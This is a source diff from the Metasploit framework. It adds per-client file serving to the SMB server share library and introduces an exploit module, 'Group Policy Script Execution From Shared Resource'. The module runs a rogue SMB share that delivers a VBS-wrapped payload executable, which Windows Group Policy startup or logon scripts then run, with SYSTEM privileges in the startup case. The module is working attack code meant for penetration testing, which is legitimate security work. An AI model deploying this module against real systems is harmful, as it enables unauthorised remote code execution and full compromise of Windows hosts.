Lad rapid7#5125, Group Policy startup exploit

Author: wchen-r7

lib/msf/core/exploit/smb/server/share.rb

@@ -233,6 +233,18 @@ def unc
         path
       end
 
+      # Returns the file contents for the requested file
+      #
+      # @param file [String] the requested file
+      # @param folder [String] the requested folder
+      # @return [String] The file contents.
+      # @note This method will be useful when multiple files are supported. At the
+      #   moment is used to be overriden by modules. So they can customize the file
+      #   contents.
+      def get_file_contents(client:, file: '', folder: '')
+        file_contents
+      end
+
       # Builds the server address.
       #
       # @return [String] The server address.

lib/msf/core/exploit/smb/server/share/command/nt_create_andx.rb

@@ -17,20 +17,29 @@ def smb_cmd_nt_create_andx(c, buff)
             pkt = CONST::SMB_CREATE_PKT.make_struct
             pkt.from_s(buff)
 
-            payload = (pkt['Payload'].v['Payload']).downcase
-            payload.gsub!(/^[\x00]*/, '') # delete padding
-            payload = Rex::Text.ascii_safe_hex(payload)
-            payload.gsub!(/\\x([0-9a-f]{2})/i, '') # delete hex chars
+            payload = pkt['Payload'].v['Payload'].downcase
+
+            if pkt['Payload']['SMB'].v['Flags2'] & CONST::FLAGS2_UNICODE_STRINGS == CONST::FLAGS2_UNICODE_STRINGS
+              # If path length is odd first character is alignment
+              if payload.length.odd?
+                payload = payload[1..-1]
+              end
+              payload = Rex::Text.to_ascii(payload)
+            end
+
+            payload.gsub!(/[\x00]*/, '') # delete nulls
 
             if payload.nil? || payload.empty?
               payload = file_name
             end
 
+            contents = get_file_contents(client: c)
+
             if payload.ends_with?(file_name.downcase)
               vprint_status("SMB Share - #{smb[:ip]} SMB_COM_NT_CREATE_ANDX request for #{unc}... ")
               fid = smb[:file_id].to_i
               attribs = CONST::SMB_EXT_FILE_ATTR_NORMAL
-              eof = file_contents.length
+              eof = contents.length
               is_dir = 0
             elsif folder_name && payload.ends_with?(folder_name.downcase)
               fid = smb[:dir_id].to_i

lib/msf/core/exploit/smb/server/share/command/read_andx.rb

@@ -19,10 +19,12 @@ def smb_cmd_read_andx(c, buff)
             offset = pkt['Payload'].v['Offset']
             length = pkt['Payload'].v['MaxCountLow']
 
+            contents = get_file_contents(client: c)
+
             send_read_andx_res(c, {
               data_len_low: length,
               byte_count: length,
-              data: file_contents[offset, length]
+              data: contents[offset, length]
             })
           end
 

lib/msf/core/exploit/smb/server/share/information_level/find.rb

@@ -13,10 +13,11 @@ module Find
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_both_directory_info(c, path)
+            contents = get_file_contents(client: c)
 
             if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
-              length = file_contents.length
+              length = contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
@@ -57,7 +58,7 @@ def smb_cmd_find_file_both_directory_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_names_info(c, path)
-            if path && path.include?(file_name.downcase)
+            if path && path.ends_with?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
             elsif path && folder_name && path.ends_with?(folder_name.downcase)
               data = Rex::Text.to_unicode(path)
@@ -77,10 +78,11 @@ def smb_cmd_find_file_names_info(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_find_file_full_directory_info(c, path)
+            contents = get_file_contents(client: c)
 
             if path && path.include?(file_name.downcase)
               data = Rex::Text.to_unicode(file_name)
-              length = file_contents.length
+              length = contents.length
               ea = 0
               alloc = 1048576 # Allocation Size = 1048576 || 1Mb
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL # File

lib/msf/core/exploit/smb/server/share/information_level/query.rb

@@ -33,12 +33,14 @@ def smb_cmd_trans_query_file_info_basic(c, fid)
           # @param fid [Fixnum] The file identifier which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_file_info_standard(c, fid)
+            contents = get_file_contents(client: c)
+
             send_info_standard_res(c, {
               allocation_size: 1048576,
               number_links: 1,
               delete_pending: 0,
               directory: 0,
-              end_of_file: file_contents.length
+              end_of_file: contents.length
             })
           end
 
@@ -69,6 +71,8 @@ def smb_cmd_trans_query_path_info_basic(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_standard(c, path)
+            contents = get_file_contents(client: c)
+
             if path && path.include?(file_name.downcase)
               attrib = 0 # File attributes => file
             elsif path && folder_name && path.ends_with?(folder_name.downcase)
@@ -84,7 +88,7 @@ def smb_cmd_trans_query_path_info_standard(c, path)
               number_links: 1,
               delete_pending: 0,
               directory: attrib,
-              end_of_file: file_contents.length
+              end_of_file: contents.length
             })
           end
 
@@ -95,6 +99,7 @@ def smb_cmd_trans_query_path_info_standard(c, path)
           # @param path [String] The path which the client is requesting info from.
           # @return [Fixnum] The number of bytes returned to the client as response.
           def smb_cmd_trans_query_path_info_network(c, path)
+            contents = get_file_contents(client: c)
 
             if path && path.include?(file_name.downcase)
               attrib = CONST::SMB_EXT_FILE_ATTR_NORMAL
@@ -108,7 +113,7 @@ def smb_cmd_trans_query_path_info_network(c, path)
 
             send_info_network_res(c, {
               allocation_size: 1048576,
-              end_of_file: file_contents.length,
+              end_of_file: contents.length,
               file_attributes: attrib
             })
           end

modules/exploits/windows/smb/group_policy_startup.rb

@@ -0,0 +1,86 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ManualRanking
+
+  include Msf::Exploit::Remote::SMB::Server::Share
+
+  def initialize(info={})
+    super(update_info(info,
+      'Name'          => 'Group Policy Script Execution From Shared Resource',
+      'Description'   => %q{
+        This is a general-purpose module for exploiting systems with Windows Group Policy
+        configured to load VBS startup/logon scripts from remote locations. This module runs
+        a SMB shared resource that will provide a payload through a VBS file. Startup scripts
+        will be executed with SYSTEM privileges, while logon scripts will be executed with the
+        user privileges. Have into account which the attacker still needs to redirect the
+        target traffic to the fake SMB share to exploit it successfully. Please note in some
+        cases, it will take 5 to 10 minutes to receive a session.
+      },
+      'Author'      =>
+        [
+          'Sam Bertram <sbertram[at]gdssecurity.com>', # BadSamba
+          'juan vazquez' # msf module
+        ],
+      'References'     =>
+        [
+          ['URL', 'http://blog.gdssecurity.com/labs/2015/1/26/badsamba-exploiting-windows-startup-scripts-using-a-maliciou.html'],
+          ['URL', 'https://github.com/GDSSecurity/BadSamba']
+        ],
+      'DefaultOptions' =>
+        {
+          'EXITFUNC' => 'thread',
+        },
+      'Privileged'     => false,
+      'Platform'       => 'win',
+      'Arch'           => [ARCH_X86, ARCH_X86_64],
+      'Payload'        =>
+        {
+          'Space'       => 2048,
+          'DisableNops' => true
+        },
+      'Targets'        =>
+        [
+          [ 'Windows x86', { 'Arch' => ARCH_X86 } ],
+          [ 'Windows x64', { 'Arch' => ARCH_X86_64 } ]
+        ],
+      'DefaultTarget'  => 0,
+      'DisclosureDate' => 'Jan 26 2015'
+    ))
+
+    register_options(
+      [
+        OptString.new('FILE_NAME', [ false, 'VBS File name to share (Default: random .vbs)'])
+      ], self.class)
+
+    deregister_options('FILE_CONTENTS')
+  end
+
+  def setup
+    super
+    self.file_name = datastore['FILE_NAME'] || "#{Rex::Text.rand_text_alpha(4 + rand(3))}.vbs"
+    @custom_payloads = {}
+    print_status("File available on #{unc}...")
+  end
+
+  def on_client_connect(client)
+    super(client)
+
+    unless @custom_payloads[:client]
+      p = regenerate_payload(client)
+      exe = p.encoded_exe
+      @custom_payloads[client] = Msf::Util::EXE.to_exe_vbs(exe)
+    end
+  end
+
+  def get_file_contents(client:)
+    contents = @custom_payloads[client] || super(client: client)
+
+    contents
+  end
+end